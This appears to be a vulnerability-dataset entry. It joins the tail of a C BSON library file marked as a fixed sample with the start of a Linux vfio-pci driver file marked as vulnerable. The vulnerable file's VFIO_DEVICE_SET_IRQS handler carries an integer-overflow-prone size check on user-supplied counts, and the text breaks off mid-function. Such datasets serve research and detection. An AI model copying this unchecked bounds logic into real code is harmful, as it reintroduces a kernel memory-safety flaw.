if ( bson_append_estart( b, BSON_ARRAY, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_finish_object( bson *b ) {
char *start;
int i;
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b , 0 );
start = b->data + b->stack[ --b->stackPos ];
i = ( int )( b->cur - start );
bson_little_endian32( start, &i );
return BSON_OK;
}
MONGO_EXPORT double bson_int64_to_double( int64_t i64 ) {
return (double)i64;
}
MONGO_EXPORT int bson_append_finish_array( bson *b ) {
return bson_append_finish_object( b );
}
/* Error handling and allocators. */
static bson_err_handler err_handler = NULL;
MONGO_EXPORT bson_err_handler set_bson_err_handler( bson_err_handler func ) {
bson_err_handler old = err_handler;
err_handler = func;
return old;
}
MONGO_EXPORT void bson_free( void *ptr ) {
bson_free_func( ptr );
}
MONGO_EXPORT void *bson_malloc( size_t size ) {
void *p;
p = bson_malloc_func( size );
bson_fatal_msg( !!p, "malloc() failed" );
return p;
}
void *bson_realloc( void *ptr, size_t size ) {
void *p;
p = bson_realloc_func( ptr, size );
bson_fatal_msg( !!p, "realloc() failed" );
return p;
}
int _bson_errprintf( const char *format, ... ) {
va_list ap;
int ret = 0;
va_start( ap, format );
#ifndef R_SAFETY_NET
ret = vfprintf( stderr, format, ap );
#endif
va_end( ap );
return ret;
}
/**
* This method is invoked when a non-fatal bson error is encountered.
* Calls the error handler if available.
*
* @param
*/
void bson_builder_error( bson *b ) {
if( err_handler )
err_handler( "BSON error." );
}
void bson_fatal( int ok ) {
bson_fatal_msg( ok, "" );
}
void bson_fatal_msg( int ok , const char *msg ) {
if ( ok )
return;
if ( err_handler ) {
err_handler( msg );
}
#ifndef R_SAFETY_NET
bson_errprintf( "error: %s\n" , msg );
exit( -5 );
#endif
}
/* Efficiently copy an integer to a string. */
extern const char bson_numstrs[1000][4];
void bson_numstr( char *str, int i ) {
if( i < 1000 )
memcpy( str, bson_numstrs[i], 4 );
else
bson_sprintf( str,"%d", i );
}
MONGO_EXPORT void bson_swap_endian64( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[7];
out[1] = in[6];
out[2] = in[5];
out[3] = in[4];
out[4] = in[3];
out[5] = in[2];
out[6] = in[1];
out[7] = in[0];
}
MONGO_EXPORT void bson_swap_endian32( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[3];
out[1] = in[2];
out[2] = in[1];
out[3] = in[0];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3983_1 |
crossvul-cpp_data_bad_5375_0 | /*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/device.h>
#include <linux/eventfd.h>
#include <linux/file.h>
#include <linux/interrupt.h>
#include <linux/iommu.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/notifier.h>
#include <linux/pci.h>
#include <linux/pm_runtime.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include <linux/vfio.h>
#include <linux/vgaarb.h>
#include "vfio_pci_private.h"
#define DRIVER_VERSION "0.2"
#define DRIVER_AUTHOR "Alex Williamson <alex.williamson@redhat.com>"
#define DRIVER_DESC "VFIO PCI - User Level meta-driver"
static char ids[1024] __initdata;
module_param_string(ids, ids, sizeof(ids), 0);
MODULE_PARM_DESC(ids, "Initial PCI IDs to add to the vfio driver, format is \"vendor:device[:subvendor[:subdevice[:class[:class_mask]]]]\" and multiple comma separated entries can be specified");
static bool nointxmask;
module_param_named(nointxmask, nointxmask, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(nointxmask,
"Disable support for PCI 2.3 style INTx masking. If this resolves problems for specific devices, report lspci -vvvxxx to linux-pci@vger.kernel.org so the device can be fixed automatically via the broken_intx_masking flag.");
#ifdef CONFIG_VFIO_PCI_VGA
static bool disable_vga;
module_param(disable_vga, bool, S_IRUGO);
MODULE_PARM_DESC(disable_vga, "Disable VGA resource access through vfio-pci");
#endif
static bool disable_idle_d3;
module_param(disable_idle_d3, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(disable_idle_d3,
"Disable using the PCI D3 low power state for idle, unused devices");
static DEFINE_MUTEX(driver_lock);
static inline bool vfio_vga_disabled(void)
{
#ifdef CONFIG_VFIO_PCI_VGA
return disable_vga;
#else
return true;
#endif
}
/*
* Our VGA arbiter participation is limited since we don't know anything
* about the device itself. However, if the device is the only VGA device
* downstream of a bridge and VFIO VGA support is disabled, then we can
* safely return legacy VGA IO and memory as not decoded since the user
* has no way to get to it and routing can be disabled externally at the
* bridge.
*/
static unsigned int vfio_pci_set_vga_decode(void *opaque, bool single_vga)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *tmp = NULL, *pdev = vdev->pdev;
unsigned char max_busnr;
unsigned int decodes;
if (single_vga || !vfio_vga_disabled() || pci_is_root_bus(pdev->bus))
return VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
max_busnr = pci_bus_max_busnr(pdev->bus);
decodes = VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM;
while ((tmp = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, tmp)) != NULL) {
if (tmp == pdev ||
pci_domain_nr(tmp->bus) != pci_domain_nr(pdev->bus) ||
pci_is_root_bus(tmp->bus))
continue;
if (tmp->bus->number >= pdev->bus->number &&
tmp->bus->number <= max_busnr) {
pci_dev_put(tmp);
decodes |= VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
break;
}
}
return decodes;
}
static inline bool vfio_pci_is_vga(struct pci_dev *pdev)
{
return (pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA;
}
static void vfio_pci_probe_mmaps(struct vfio_pci_device *vdev)
{
struct resource *res;
int bar;
struct vfio_pci_dummy_resource *dummy_res;
INIT_LIST_HEAD(&vdev->dummy_resources_list);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
res = vdev->pdev->resource + bar;
if (!IS_ENABLED(CONFIG_VFIO_PCI_MMAP))
goto no_mmap;
if (!(res->flags & IORESOURCE_MEM))
goto no_mmap;
/*
* The PCI core shouldn't set up a resource with a
* type but zero size. But there may be bugs that
* cause us to do that.
*/
if (!resource_size(res))
goto no_mmap;
if (resource_size(res) >= PAGE_SIZE) {
vdev->bar_mmap_supported[bar] = true;
continue;
}
if (!(res->start & ~PAGE_MASK)) {
/*
* Add a dummy resource to reserve the remainder
* of the exclusive page in case that hot-add
* device's bar is assigned into it.
*/
dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
if (dummy_res == NULL)
goto no_mmap;
dummy_res->resource.name = "vfio sub-page reserved";
dummy_res->resource.start = res->end + 1;
dummy_res->resource.end = res->start + PAGE_SIZE - 1;
dummy_res->resource.flags = res->flags;
if (request_resource(res->parent,
&dummy_res->resource)) {
kfree(dummy_res);
goto no_mmap;
}
dummy_res->index = bar;
list_add(&dummy_res->res_next,
&vdev->dummy_resources_list);
vdev->bar_mmap_supported[bar] = true;
continue;
}
/*
* Here we don't handle the case when the BAR is not page
* aligned because we can't expect the BAR will be
* assigned into the same location in a page in guest
* when we passthrough the BAR. And it's hard to access
* this BAR in userspace because we have no way to get
* the BAR's location in a page.
*/
no_mmap:
vdev->bar_mmap_supported[bar] = false;
}
}
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev);
static void vfio_pci_disable(struct vfio_pci_device *vdev);
/*
* INTx masking requires the ability to disable INTx signaling via PCI_COMMAND
* _and_ the ability detect when the device is asserting INTx via PCI_STATUS.
* If a device implements the former but not the latter we would typically
* expect broken_intx_masking be set and require an exclusive interrupt.
* However since we do have control of the device's ability to assert INTx,
* we can instead pretend that the device does not implement INTx, virtualizing
* the pin register to report zero and maintaining DisINTx set on the host.
*/
static bool vfio_pci_nointx(struct pci_dev *pdev)
{
switch (pdev->vendor) {
case PCI_VENDOR_ID_INTEL:
switch (pdev->device) {
/* All i40e (XL710/X710) 10/20/40GbE NICs */
case 0x1572:
case 0x1574:
case 0x1580 ... 0x1581:
case 0x1583 ... 0x1589:
case 0x37d0 ... 0x37d2:
return true;
default:
return false;
}
}
return false;
}
static int vfio_pci_enable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
int ret;
u16 cmd;
u8 msix_pos;
pci_set_power_state(pdev, PCI_D0);
/* Don't allow our initial saved state to include busmaster */
pci_clear_master(pdev);
ret = pci_enable_device(pdev);
if (ret)
return ret;
vdev->reset_works = (pci_reset_function(pdev) == 0);
pci_save_state(pdev);
vdev->pci_saved_state = pci_store_saved_state(pdev);
if (!vdev->pci_saved_state)
pr_debug("%s: Couldn't store %s saved state\n",
__func__, dev_name(&pdev->dev));
if (likely(!nointxmask)) {
if (vfio_pci_nointx(pdev)) {
dev_info(&pdev->dev, "Masking broken INTx support\n");
vdev->nointx = true;
pci_intx(pdev, 0);
} else
vdev->pci_2_3 = pci_intx_mask_supported(pdev);
}
pci_read_config_word(pdev, PCI_COMMAND, &cmd);
if (vdev->pci_2_3 && (cmd & PCI_COMMAND_INTX_DISABLE)) {
cmd &= ~PCI_COMMAND_INTX_DISABLE;
pci_write_config_word(pdev, PCI_COMMAND, cmd);
}
ret = vfio_config_init(vdev);
if (ret) {
kfree(vdev->pci_saved_state);
vdev->pci_saved_state = NULL;
pci_disable_device(pdev);
return ret;
}
msix_pos = pdev->msix_cap;
if (msix_pos) {
u16 flags;
u32 table;
pci_read_config_word(pdev, msix_pos + PCI_MSIX_FLAGS, &flags);
pci_read_config_dword(pdev, msix_pos + PCI_MSIX_TABLE, &table);
vdev->msix_bar = table & PCI_MSIX_TABLE_BIR;
vdev->msix_offset = table & PCI_MSIX_TABLE_OFFSET;
vdev->msix_size = ((flags & PCI_MSIX_FLAGS_QSIZE) + 1) * 16;
} else
vdev->msix_bar = 0xFF;
if (!vfio_vga_disabled() && vfio_pci_is_vga(pdev))
vdev->has_vga = true;
if (vfio_pci_is_vga(pdev) &&
pdev->vendor == PCI_VENDOR_ID_INTEL &&
IS_ENABLED(CONFIG_VFIO_PCI_IGD)) {
ret = vfio_pci_igd_init(vdev);
if (ret) {
dev_warn(&vdev->pdev->dev,
"Failed to setup Intel IGD regions\n");
vfio_pci_disable(vdev);
return ret;
}
}
vfio_pci_probe_mmaps(vdev);
return 0;
}
static void vfio_pci_disable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
struct vfio_pci_dummy_resource *dummy_res, *tmp;
int i, bar;
/* Stop the device from further DMA */
pci_clear_master(pdev);
vfio_pci_set_irqs_ioctl(vdev, VFIO_IRQ_SET_DATA_NONE |
VFIO_IRQ_SET_ACTION_TRIGGER,
vdev->irq_type, 0, 0, NULL);
vdev->virq_disabled = false;
for (i = 0; i < vdev->num_regions; i++)
vdev->region[i].ops->release(vdev, &vdev->region[i]);
vdev->num_regions = 0;
kfree(vdev->region);
vdev->region = NULL; /* don't krealloc a freed pointer */
vfio_config_free(vdev);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
if (!vdev->barmap[bar])
continue;
pci_iounmap(pdev, vdev->barmap[bar]);
pci_release_selected_regions(pdev, 1 << bar);
vdev->barmap[bar] = NULL;
}
list_for_each_entry_safe(dummy_res, tmp,
&vdev->dummy_resources_list, res_next) {
list_del(&dummy_res->res_next);
release_resource(&dummy_res->resource);
kfree(dummy_res);
}
vdev->needs_reset = true;
/*
* If we have saved state, restore it. If we can reset the device,
* even better. Resetting with current state seems better than
* nothing, but saving and restoring current state without reset
* is just busy work.
*/
if (pci_load_and_free_saved_state(pdev, &vdev->pci_saved_state)) {
pr_info("%s: Couldn't reload %s saved state\n",
__func__, dev_name(&pdev->dev));
if (!vdev->reset_works)
goto out;
pci_save_state(pdev);
}
/*
* Disable INTx and MSI, presumably to avoid spurious interrupts
* during reset. Stolen from pci_reset_function()
*/
pci_write_config_word(pdev, PCI_COMMAND, PCI_COMMAND_INTX_DISABLE);
/*
* Try to reset the device. The success of this is dependent on
* being able to lock the device, which is not always possible.
*/
if (vdev->reset_works && !pci_try_reset_function(pdev))
vdev->needs_reset = false;
pci_restore_state(pdev);
out:
pci_disable_device(pdev);
vfio_pci_try_bus_reset(vdev);
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D3hot);
}
static void vfio_pci_release(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&driver_lock);
if (!(--vdev->refcnt)) {
vfio_spapr_pci_eeh_release(vdev->pdev);
vfio_pci_disable(vdev);
}
mutex_unlock(&driver_lock);
module_put(THIS_MODULE);
}
static int vfio_pci_open(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
int ret = 0;
if (!try_module_get(THIS_MODULE))
return -ENODEV;
mutex_lock(&driver_lock);
if (!vdev->refcnt) {
ret = vfio_pci_enable(vdev);
if (ret)
goto error;
vfio_spapr_pci_eeh_open(vdev->pdev);
}
vdev->refcnt++;
error:
mutex_unlock(&driver_lock);
if (ret)
module_put(THIS_MODULE);
return ret;
}
static int vfio_pci_get_irq_count(struct vfio_pci_device *vdev, int irq_type)
{
if (irq_type == VFIO_PCI_INTX_IRQ_INDEX) {
u8 pin;
pci_read_config_byte(vdev->pdev, PCI_INTERRUPT_PIN, &pin);
if (IS_ENABLED(CONFIG_VFIO_PCI_INTX) && !vdev->nointx && pin)
return 1;
} else if (irq_type == VFIO_PCI_MSI_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msi_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSI_FLAGS, &flags);
return 1 << ((flags & PCI_MSI_FLAGS_QMASK) >> 1);
}
} else if (irq_type == VFIO_PCI_MSIX_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msix_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSIX_FLAGS, &flags);
return (flags & PCI_MSIX_FLAGS_QSIZE) + 1;
}
} else if (irq_type == VFIO_PCI_ERR_IRQ_INDEX) {
if (pci_is_pcie(vdev->pdev))
return 1;
} else if (irq_type == VFIO_PCI_REQ_IRQ_INDEX) {
return 1;
}
return 0;
}
static int vfio_pci_count_devs(struct pci_dev *pdev, void *data)
{
(*(int *)data)++;
return 0;
}
struct vfio_pci_fill_info {
int max;
int cur;
struct vfio_pci_dependent_device *devices;
};
static int vfio_pci_fill_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_fill_info *fill = data;
struct iommu_group *iommu_group;
if (fill->cur == fill->max)
return -EAGAIN; /* Something changed, try again */
iommu_group = iommu_group_get(&pdev->dev);
if (!iommu_group)
return -EPERM; /* Cannot reset non-isolated devices */
fill->devices[fill->cur].group_id = iommu_group_id(iommu_group);
fill->devices[fill->cur].segment = pci_domain_nr(pdev->bus);
fill->devices[fill->cur].bus = pdev->bus->number;
fill->devices[fill->cur].devfn = pdev->devfn;
fill->cur++;
iommu_group_put(iommu_group);
return 0;
}
struct vfio_pci_group_entry {
struct vfio_group *group;
int id;
};
struct vfio_pci_group_info {
int count;
struct vfio_pci_group_entry *groups;
};
static int vfio_pci_validate_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_group_info *info = data;
struct iommu_group *group;
int id, i;
group = iommu_group_get(&pdev->dev);
if (!group)
return -EPERM;
id = iommu_group_id(group);
for (i = 0; i < info->count; i++)
if (info->groups[i].id == id)
break;
iommu_group_put(group);
return (i == info->count) ? -EINVAL : 0;
}
static bool vfio_pci_dev_below_slot(struct pci_dev *pdev, struct pci_slot *slot)
{
for (; pdev; pdev = pdev->bus->self)
if (pdev->bus == slot->bus)
return (pdev->slot == slot);
return false;
}
struct vfio_pci_walk_info {
int (*fn)(struct pci_dev *, void *data);
void *data;
struct pci_dev *pdev;
bool slot;
int ret;
};
static int vfio_pci_walk_wrapper(struct pci_dev *pdev, void *data)
{
struct vfio_pci_walk_info *walk = data;
if (!walk->slot || vfio_pci_dev_below_slot(pdev, walk->pdev->slot))
walk->ret = walk->fn(pdev, walk->data);
return walk->ret;
}
static int vfio_pci_for_each_slot_or_bus(struct pci_dev *pdev,
int (*fn)(struct pci_dev *,
void *data), void *data,
bool slot)
{
struct vfio_pci_walk_info walk = {
.fn = fn, .data = data, .pdev = pdev, .slot = slot, .ret = 0,
};
pci_walk_bus(pdev->bus, vfio_pci_walk_wrapper, &walk);
return walk.ret;
}
static int msix_sparse_mmap_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_sparse_mmap *sparse;
size_t end, size;
int nr_areas = 2, i = 0;
end = pci_resource_len(vdev->pdev, vdev->msix_bar);
/* If MSI-X table is aligned to the start or end, only one area */
if (((vdev->msix_offset & PAGE_MASK) == 0) ||
(PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) >= end))
nr_areas = 1;
size = sizeof(*sparse) + (nr_areas * sizeof(*sparse->areas));
header = vfio_info_cap_add(caps, size,
VFIO_REGION_INFO_CAP_SPARSE_MMAP, 1);
if (IS_ERR(header))
return PTR_ERR(header);
sparse = container_of(header,
struct vfio_region_info_cap_sparse_mmap, header);
sparse->nr_areas = nr_areas;
if (vdev->msix_offset & PAGE_MASK) {
sparse->areas[i].offset = 0;
sparse->areas[i].size = vdev->msix_offset & PAGE_MASK;
i++;
}
if (PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) < end) {
sparse->areas[i].offset = PAGE_ALIGN(vdev->msix_offset +
vdev->msix_size);
sparse->areas[i].size = end - sparse->areas[i].offset;
i++;
}
return 0;
}
static int region_type_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps,
unsigned int type, unsigned int subtype)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_type *cap;
header = vfio_info_cap_add(caps, sizeof(*cap),
VFIO_REGION_INFO_CAP_TYPE, 1);
if (IS_ERR(header))
return PTR_ERR(header);
cap = container_of(header, struct vfio_region_info_cap_type, header);
cap->type = type;
cap->subtype = subtype;
return 0;
}
int vfio_pci_register_dev_region(struct vfio_pci_device *vdev,
unsigned int type, unsigned int subtype,
const struct vfio_pci_regops *ops,
size_t size, u32 flags, void *data)
{
struct vfio_pci_region *region;
region = krealloc(vdev->region,
(vdev->num_regions + 1) * sizeof(*region),
GFP_KERNEL);
if (!region)
return -ENOMEM;
vdev->region = region;
vdev->region[vdev->num_regions].type = type;
vdev->region[vdev->num_regions].subtype = subtype;
vdev->region[vdev->num_regions].ops = ops;
vdev->region[vdev->num_regions].size = size;
vdev->region[vdev->num_regions].flags = flags;
vdev->region[vdev->num_regions].data = data;
vdev->num_regions++;
return 0;
}
static long vfio_pci_ioctl(void *device_data,
unsigned int cmd, unsigned long arg)
{
struct vfio_pci_device *vdev = device_data;
unsigned long minsz;
if (cmd == VFIO_DEVICE_GET_INFO) {
struct vfio_device_info info;
minsz = offsetofend(struct vfio_device_info, num_irqs);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
info.flags = VFIO_DEVICE_FLAGS_PCI;
if (vdev->reset_works)
info.flags |= VFIO_DEVICE_FLAGS_RESET;
info.num_regions = VFIO_PCI_NUM_REGIONS + vdev->num_regions;
info.num_irqs = VFIO_PCI_NUM_IRQS;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_REGION_INFO) {
struct pci_dev *pdev = vdev->pdev;
struct vfio_region_info info;
struct vfio_info_cap caps = { .buf = NULL, .size = 0 };
int i, ret;
minsz = offsetofend(struct vfio_region_info, offset);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pdev->cfg_size;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
info.flags = 0;
break;
}
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
if (vdev->bar_mmap_supported[info.index]) {
info.flags |= VFIO_REGION_INFO_FLAG_MMAP;
if (info.index == vdev->msix_bar) {
ret = msix_sparse_mmap_cap(vdev, &caps);
if (ret)
return ret;
}
}
break;
case VFIO_PCI_ROM_REGION_INDEX:
{
void __iomem *io;
size_t size;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.flags = 0;
/* Report the BAR size, not the ROM size */
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
/* Shadow ROMs appear as PCI option ROMs */
if (pdev->resource[PCI_ROM_RESOURCE].flags &
IORESOURCE_ROM_SHADOW)
info.size = 0x20000;
else
break;
}
/* Is it really there? */
io = pci_map_rom(pdev, &size);
if (!io || !size) {
info.size = 0;
break;
}
pci_unmap_rom(pdev, io);
info.flags = VFIO_REGION_INFO_FLAG_READ;
break;
}
case VFIO_PCI_VGA_REGION_INDEX:
if (!vdev->has_vga)
return -EINVAL;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = 0xc0000;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
default:
if (info.index >=
VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
i = info.index - VFIO_PCI_NUM_REGIONS;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = vdev->region[i].size;
info.flags = vdev->region[i].flags;
ret = region_type_cap(vdev, &caps,
vdev->region[i].type,
vdev->region[i].subtype);
if (ret)
return ret;
}
if (caps.size) {
info.flags |= VFIO_REGION_INFO_FLAG_CAPS;
if (info.argsz < sizeof(info) + caps.size) {
info.argsz = sizeof(info) + caps.size;
info.cap_offset = 0;
} else {
vfio_info_cap_shift(&caps, sizeof(info));
if (copy_to_user((void __user *)arg +
sizeof(info), caps.buf,
caps.size)) {
kfree(caps.buf);
return -EFAULT;
}
info.cap_offset = sizeof(info);
}
kfree(caps.buf);
}
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_IRQ_INFO) {
struct vfio_irq_info info;
minsz = offsetofend(struct vfio_irq_info, count);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz || info.index >= VFIO_PCI_NUM_IRQS)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_INTX_IRQ_INDEX ... VFIO_PCI_MSIX_IRQ_INDEX:
case VFIO_PCI_REQ_IRQ_INDEX:
break;
case VFIO_PCI_ERR_IRQ_INDEX:
if (pci_is_pcie(vdev->pdev))
break;
/* pass thru to return error */
default:
return -EINVAL;
}
info.flags = VFIO_IRQ_INFO_EVENTFD;
info.count = vfio_pci_get_irq_count(vdev, info.index);
if (info.index == VFIO_PCI_INTX_IRQ_INDEX)
info.flags |= (VFIO_IRQ_INFO_MASKABLE |
VFIO_IRQ_INFO_AUTOMASKED);
else
info.flags |= VFIO_IRQ_INFO_NORESIZE;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_SET_IRQS) {
struct vfio_irq_set hdr;
u8 *data = NULL;
int ret = 0;
minsz = offsetofend(struct vfio_irq_set, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.index >= VFIO_PCI_NUM_IRQS ||
hdr.flags & ~(VFIO_IRQ_SET_DATA_TYPE_MASK |
VFIO_IRQ_SET_ACTION_TYPE_MASK))
return -EINVAL;
if (!(hdr.flags & VFIO_IRQ_SET_DATA_NONE)) {
size_t size;
int max = vfio_pci_get_irq_count(vdev, hdr.index);
if (hdr.flags & VFIO_IRQ_SET_DATA_BOOL)
size = sizeof(uint8_t);
else if (hdr.flags & VFIO_IRQ_SET_DATA_EVENTFD)
size = sizeof(int32_t);
else
return -EINVAL;
if (hdr.argsz - minsz < hdr.count * size ||
hdr.start >= max || hdr.start + hdr.count > max)
return -EINVAL;
data = memdup_user((void __user *)(arg + minsz),
hdr.count * size);
if (IS_ERR(data))
return PTR_ERR(data);
}
mutex_lock(&vdev->igate);
ret = vfio_pci_set_irqs_ioctl(vdev, hdr.flags, hdr.index,
hdr.start, hdr.count, data);
mutex_unlock(&vdev->igate);
kfree(data);
return ret;
} else if (cmd == VFIO_DEVICE_RESET) {
return vdev->reset_works ?
pci_try_reset_function(vdev->pdev) : -EINVAL;
} else if (cmd == VFIO_DEVICE_GET_PCI_HOT_RESET_INFO) {
struct vfio_pci_hot_reset_info hdr;
struct vfio_pci_fill_info fill = { 0 };
struct vfio_pci_dependent_device *devices = NULL;
bool slot = false;
int ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset_info, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz)
return -EINVAL;
hdr.flags = 0;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/* How many devices are affected? */
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&fill.max, slot);
if (ret)
return ret;
WARN_ON(!fill.max); /* Should always be at least one */
/*
* If there's enough space, fill it now, otherwise return
* -ENOSPC and the number of devices affected.
*/
if (hdr.argsz < sizeof(hdr) + (fill.max * sizeof(*devices))) {
ret = -ENOSPC;
hdr.count = fill.max;
goto reset_info_exit;
}
devices = kcalloc(fill.max, sizeof(*devices), GFP_KERNEL);
if (!devices)
return -ENOMEM;
fill.devices = devices;
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_fill_devs,
&fill, slot);
/*
* If a device was removed between counting and filling,
* we may come up short of fill.max. If a device was
* added, we'll have a return of -EAGAIN above.
*/
if (!ret)
hdr.count = fill.cur;
reset_info_exit:
if (copy_to_user((void __user *)arg, &hdr, minsz))
ret = -EFAULT;
if (!ret) {
if (copy_to_user((void __user *)(arg + minsz), devices,
hdr.count * sizeof(*devices)))
ret = -EFAULT;
}
kfree(devices);
return ret;
} else if (cmd == VFIO_DEVICE_PCI_HOT_RESET) {
struct vfio_pci_hot_reset hdr;
int32_t *group_fds;
struct vfio_pci_group_entry *groups;
struct vfio_pci_group_info info;
bool slot = false;
int i, count = 0, ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.flags)
return -EINVAL;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/*
* We can't let userspace give us an arbitrarily large
* buffer to copy, so verify how many we think there
* could be. Note groups can have multiple devices so
* one group per device is the max.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&count, slot);
if (ret)
return ret;
/* Somewhere between 1 and count is OK */
if (!hdr.count || hdr.count > count)
return -EINVAL;
group_fds = kcalloc(hdr.count, sizeof(*group_fds), GFP_KERNEL);
groups = kcalloc(hdr.count, sizeof(*groups), GFP_KERNEL);
if (!group_fds || !groups) {
kfree(group_fds);
kfree(groups);
return -ENOMEM;
}
if (copy_from_user(group_fds, (void __user *)(arg + minsz),
hdr.count * sizeof(*group_fds))) {
kfree(group_fds);
kfree(groups);
return -EFAULT;
}
/*
* For each group_fd, get the group through the vfio external
* user interface and store the group and iommu ID. This
* ensures the group is held across the reset.
*/
for (i = 0; i < hdr.count; i++) {
struct vfio_group *group;
struct fd f = fdget(group_fds[i]);
if (!f.file) {
ret = -EBADF;
break;
}
group = vfio_group_get_external_user(f.file);
fdput(f);
if (IS_ERR(group)) {
ret = PTR_ERR(group);
break;
}
groups[i].group = group;
groups[i].id = vfio_external_user_iommu_id(group);
}
kfree(group_fds);
/* release reference to groups on error */
if (ret)
goto hot_reset_release;
info.count = hdr.count;
info.groups = groups;
/*
* Test whether all the affected devices are contained
* by the set of groups provided by the user.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_validate_devs,
&info, slot);
if (!ret)
/* User has access, do the reset */
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
hot_reset_release:
for (i--; i >= 0; i--)
vfio_group_put_external_user(groups[i].group);
kfree(groups);
return ret;
}
return -ENOTTY;
}
static ssize_t vfio_pci_rw(void *device_data, char __user *buf,
size_t count, loff_t *ppos, bool iswrite)
{
unsigned int index = VFIO_PCI_OFFSET_TO_INDEX(*ppos);
struct vfio_pci_device *vdev = device_data;
if (index >= VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
